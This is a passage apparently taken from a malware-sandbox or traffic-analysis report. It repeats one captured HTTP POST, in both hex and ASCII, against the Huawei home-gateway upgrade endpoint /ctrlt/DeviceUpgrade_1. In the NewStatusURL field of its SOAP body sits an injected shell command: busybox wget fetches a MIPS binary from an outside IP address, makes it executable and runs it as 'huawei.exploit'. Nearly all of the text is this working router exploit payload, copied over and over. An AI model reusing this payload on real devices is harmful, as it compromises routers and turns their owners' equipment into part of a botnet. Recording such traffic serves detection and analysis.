74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
